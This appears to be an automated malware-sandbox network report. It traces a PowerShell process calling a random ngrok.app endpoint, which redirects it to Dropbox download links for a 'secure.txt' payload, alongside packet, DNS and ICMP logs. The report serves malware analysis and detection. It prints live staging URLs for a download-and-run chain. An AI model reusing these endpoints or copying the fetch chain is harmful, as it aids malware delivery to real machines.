                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.370706081 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.370716095 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.370727062 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.371161938 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.371232986 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.372492075 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.375453949 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.375475883 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.375484943 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.375562906 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.375857115 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.375919104 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.396714926 CET53554401.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.408427954 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.410815954 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.411941051 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.414113998 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.489263058 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.489830017 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.489851952 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.498840094 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.499919891 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.503259897 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.504000902 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.506309986 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.528999090 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.686991930 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.692167997 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.722902060 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.722950935 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.469376087 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.469541073 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.784220934 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.788609982 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.788629055 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.789006948 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.846612930 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.846915960 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.161799908 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.163341045 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.163479090 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.163654089 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.717911959 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.718580961 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.719827890 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.721046925 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.033868074 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.035154104 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.035164118 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.035348892 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.035598040 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.036066055 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.036990881 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.037554979 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.039804935 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.298599005 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.298891068 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.300137043 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.300231934 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.613372087 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.615160942 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.616009951 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.617518902 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.617615938 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.621454954 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.627265930 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.627525091 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:35.475019932 CET5679553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:35.783879042 CET53567951.1.1.1192.168.2.5

                                                                                                                                                                                                                                                                                              ICMP Packets

                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.181634903 CET192.168.2.51.1.1.1c27b(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:02.720621109 CET192.168.2.51.1.1.10xac59Standard query (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:06.581758022 CET192.168.2.51.1.1.10x7918Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:09.481393099 CET192.168.2.51.1.1.10x342fStandard query (0)uc31f787c2bb602858cae290072a.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:20.055610895 CET192.168.2.51.1.1.10x14c0Standard query (0)ucde441054600e534d842ed4b29b.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.383778095 CET192.168.2.51.1.1.10x71fbStandard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.384078026 CET192.168.2.51.1.1.10x31f4Standard query (0)www.dropbox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:24.224034071 CET192.168.2.51.1.1.10x11b9Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:24.229825020 CET192.168.2.51.1.1.10xbd4eStandard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:24.732875109 CET192.168.2.51.1.1.10xa234Standard query (0)uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:24.854945898 CET192.168.2.51.1.1.10xf6bdStandard query (0)uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:24.855487108 CET192.168.2.51.1.1.10x2b9bStandard query (0)uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:24.909893036 CET192.168.2.51.1.1.10xc210Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:24.910106897 CET192.168.2.51.1.1.10x9fb6Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.140825987 CET192.168.2.51.1.1.10xc039Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.141132116 CET192.168.2.51.1.1.10xf7dfStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.141763926 CET192.168.2.51.1.1.10xac0bStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.142019987 CET192.168.2.51.1.1.10xc5e6Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.229948997 CET192.168.2.51.1.1.10x44f2Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.230293989 CET192.168.2.51.1.1.10x8fffStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.059489965 CET192.168.2.51.1.1.10xdf7cStandard query (0)uc48b83ada642288f62fac023367.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:35.475019932 CET192.168.2.51.1.1.10xec81Standard query (0)uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:02.936466932 CET1.1.1.1192.168.2.50xac59No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.125.209.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:02.936466932 CET1.1.1.1192.168.2.50xac59No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.125.223.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:02.936466932 CET1.1.1.1192.168.2.50xac59No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app18.158.249.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:02.936466932 CET1.1.1.1192.168.2.50xac59No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.125.102.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:02.936466932 CET1.1.1.1192.168.2.50xac59No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.124.142.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:02.936466932 CET1.1.1.1192.168.2.50xac59No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app18.192.31.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:06.911237001 CET1.1.1.1192.168.2.50x7918No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:06.911237001 CET1.1.1.1192.168.2.50x7918No error (0)www-env.dropbox-dns.com162.125.65.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:10.052923918 CET1.1.1.1192.168.2.50x342fNo error (0)uc31f787c2bb602858cae290072a.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:10.052923918 CET1.1.1.1192.168.2.50x342fNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:20.366527081 CET1.1.1.1192.168.2.50x14c0No error (0)ucde441054600e534d842ed4b29b.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:20.366527081 CET1.1.1.1192.168.2.50x14c0No error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.520953894 CET1.1.1.1192.168.2.50x71fbNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.520953894 CET1.1.1.1192.168.2.50x71fbNo error (0)www-env.dropbox-dns.com162.125.65.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.521651030 CET1.1.1.1192.168.2.50x31f4No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.837246895 CET1.1.1.1192.168.2.50x6dd2No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.837246895 CET1.1.1.1192.168.2.50x6dd2No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.925753117 CET1.1.1.1192.168.2.50x210eNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:24.368081093 CET1.1.1.1192.168.2.50xbd4eNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:24.472604990 CET1.1.1.1192.168.2.50x11b9No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.047939062 CET1.1.1.1192.168.2.50x9fb6No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.075062037 CET1.1.1.1192.168.2.50xa234No error (0)uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.075062037 CET1.1.1.1192.168.2.50xa234No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.075079918 CET1.1.1.1192.168.2.50xf6bdNo error (0)uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.075079918 CET1.1.1.1192.168.2.50xf6bdNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.169615030 CET1.1.1.1192.168.2.50xc210No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.169615030 CET1.1.1.1192.168.2.50xc210No error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.181548119 CET1.1.1.1192.168.2.50x2b9bNo error (0)uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.277641058 CET1.1.1.1192.168.2.50xc039No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.277641058 CET1.1.1.1192.168.2.50xc039No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.277870893 CET1.1.1.1192.168.2.50xf7dfNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.278156996 CET1.1.1.1192.168.2.50xac0bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.278156996 CET1.1.1.1192.168.2.50xac0bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.278588057 CET1.1.1.1192.168.2.50xc5e6No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.366796017 CET1.1.1.1192.168.2.50x8fffNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.367170095 CET1.1.1.1192.168.2.50x44f2No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.367170095 CET1.1.1.1192.168.2.50x44f2No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.396714926 CET1.1.1.1192.168.2.50xdf7cNo error (0)uc48b83ada642288f62fac023367.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.396714926 CET1.1.1.1192.168.2.50xdf7cNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:35.783879042 CET1.1.1.1192.168.2.50xec81No error (0)uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:35.783879042 CET1.1.1.1192.168.2.50xec81No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:23.695142031 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:23.695142031 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:24.703497887 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:24.703497887 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:25.719945908 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:25.719945908 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:27.719815016 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:27.719815016 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:31.732589960 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:31.732589960 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                              • 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                              • www.dropbox.com
                                                                                                                                                                                                                                                                                              • uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              • ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              • uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                              • uc48b83ada642288f62fac023367.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              • uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com

                                                                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              0192.168.2.5497043.125.209.944435660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:04 UTC230OUTGET /api/secure/fc08667ad2d7db61431b61a30eb0ffa8 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:06 UTC321INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                              Content-Length: 395
                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:06 GMT
                                                                                                                                                                                                                                                                                              Location: https://www.dropbox.com/scl/fi/ptzcgw4lpru9m0531rddz/secure.txt?rlkey=m4b7p25r8ky8361o8wsoc61f9&dl=1
                                                                                                                                                                                                                                                                                              Server: Werkzeug/3.0.3 Python/3.12.8
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:06 UTC395INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 73 68 6f 75 6c 64 20 62 65 20 72 65 64 69 72 65 63 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 74 6f 20 74 68 65 20 74 61 72 67 65 74 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 70 74 7a 63 67 77 34 6c 70 72 75 39 6d 30 35 33 31 72 64 64 7a 2f 73 65 63 75 72 65 2e 74 78 74 3f 72 6c 6b 65 79 3d 6d 34 62 37 70 32 35 72 38 6b 79 38 33 36 31 6f 38 77 73 6f 63 36 31 66 39 26 61 6d 70 3b
                                                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html lang=en><title>Redirecting...</title><h1>Redirecting...</h1><p>You should be redirected automatically to the target URL: <a href="https://www.dropbox.com/scl/fi/ptzcgw4lpru9m0531rddz/secure.txt?rlkey=m4b7p25r8ky8361o8wsoc61f9&amp;


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              1192.168.2.549705162.125.65.184435660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:08 UTC236OUTGET /scl/fi/ptzcgw4lpru9m0531rddz/secure.txt?rlkey=m4b7p25r8ky8361o8wsoc61f9&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: www.dropbox.com
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:09 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                              Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/docum [TRUNCATED]
                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
